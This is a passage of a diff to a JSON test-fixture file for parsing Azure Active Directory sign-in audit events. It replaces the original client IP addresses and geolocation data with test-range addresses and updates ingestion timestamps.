Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4274,25 +3722,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4306,7 +3736,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -4344,7 +3774,7 @@ }, "related": { "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -4356,12 +3786,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051589200Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970235300Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4397,25 +3827,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4429,7 +3841,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -4479,7 +3891,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -4491,12 +3903,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051592100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970241200Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4535,25 +3947,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4567,7 +3961,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -4605,7 +3999,7 @@ }, "related": { "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4617,12 +4011,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051595Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970247Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4658,25 +4052,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4690,7 +4066,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -4741,7 +4117,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4753,12 +4129,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051598Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970252800Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4797,25 +4173,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4829,7 +4187,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -4867,7 +4225,7 @@ }, "related": { "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4879,12 +4237,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051600900Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970258400Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4920,25 +4278,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4952,7 +4292,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -5003,7 +4343,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5015,12 +4355,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051603800Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970264Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 